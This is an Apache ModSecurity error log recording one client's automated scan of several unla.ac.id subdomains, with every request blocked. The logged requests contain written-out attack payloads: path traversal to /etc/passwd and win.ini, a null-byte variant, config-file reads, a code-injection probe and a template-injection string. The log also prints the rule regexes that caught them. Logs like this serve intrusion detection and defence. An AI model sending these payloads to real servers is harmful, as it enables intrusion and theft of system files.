[Tue Aug 29 11:45:08.389413 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO131MCo-f0AAAhab9cAAAAW"]
[Tue Aug 29 11:45:10.374966 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAe3@J0AAAAA"]
[Tue Aug 29 11:45:10.379853 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAhT3wYAAAAD"]
[Tue Aug 29 11:45:10.386433 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAh3f6kAAAA1"]
[Tue Aug 29 11:45:10.406447 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO131sCo-f0AAAhab9oAAAAW"]
[Tue Aug 29 11:45:10.408990 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAh4DXgAAAA2"]
[Tue Aug 29 11:45:10.425871 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAe3@J8AAAAA"]
[Tue Aug 29 11:45:11.367656 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAh7ws4AAAA5"]
[Tue Aug 29 11:45:11.368043 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1318Co-f0AAAhpwPMAAAAm"]
[Tue Aug 29 11:45:11.380356 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAc4E4EAAAAP"]
[Tue Aug 29 11:45:11.387637 2023] [:error] [pid 2164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAh0rUYAAAAy"]
[Tue Aug 29 11:45:11.447048 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAdOeiAAAAAS"]
[Tue Aug 29 11:45:11.464437 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAhpwPQAAAAm"]
[Tue Aug 29 11:45:12.360974 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAfbkwAAAAAZ"]
[Tue Aug 29 11:45:12.361415 2023] [:error] [pid 2160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAhwxlwAAAAt"]
[Tue Aug 29 11:45:12.379667 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAdOeiEAAAAS"]
[Tue Aug 29 11:45:12.389703 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO132MCo-f0AAAhvjV4AAAAs"]
[Tue Aug 29 11:45:12.390877 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO132MCo-f0AAAhlz34AAAAi"]
[Tue Aug 29 11:45:12.407699 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAhmFQkAAAAj"]
[Tue Aug 29 11:45:12.438926 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAhoHLoAAAAl"]
[Tue Aug 29 11:45:13.356029 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132cCo-f0AAAhxwlcAAAAv"]
[Tue Aug 29 11:45:13.375000 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAdOeiMAAAAS"]
[Tue Aug 29 11:45:13.383486 2023] [:error] [pid 2164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAh0rUkAAAAy"]
[Tue Aug 29 11:45:13.392356 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132cCo-f0AAAhmFQoAAAAj"]
[Tue Aug 29 11:45:13.395205 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAgzyTIAAAAF"]
[Tue Aug 29 11:45:13.395787 2023] [:error] [pid 2169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO132cCo-f0AAAh5RWoAAAA3"]
[Tue Aug 29 11:45:13.410732 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAheaYMAAAAY"]
[Tue Aug 29 11:45:13.414403 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAfiYtsAAAAg"]
[Tue Aug 29 11:45:14.430297 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132sCo-f0AAAheaYQAAAAY"]
[Tue Aug 29 11:45:14.439147 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132sCo-f0AAAhxwlsAAAAv"]
[Tue Aug 29 11:45:15.369576 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhtjcQAAAAq"]
[Tue Aug 29 11:45:15.372856 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAfGaiIAAAAT"]
[Tue Aug 29 11:45:15.374663 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhrqG8AAAAo"]
[Tue Aug 29 11:45:15.378010 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhab90AAAAW"]
[Tue Aug 29 11:45:15.384304 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhT3w0AAAAD"]
[Tue Aug 29 11:45:15.407068 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1328Co-f0AAAh3f7AAAAA1"]
[Tue Aug 29 11:45:16.394126 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhrqHIAAAAo"]
[Tue Aug 29 11:45:16.401355 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhhcwkAAAAd"]
[Tue Aug 29 11:45:16.412820 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/search/"] [unique_id "ZO133MCo-f0AAAdQ3zAAAAAV"]
[Tue Aug 29 11:45:16.415886 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhtjccAAAAq"]
[Tue Aug 29 11:45:16.416092 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAfbkwYAAAAZ"]
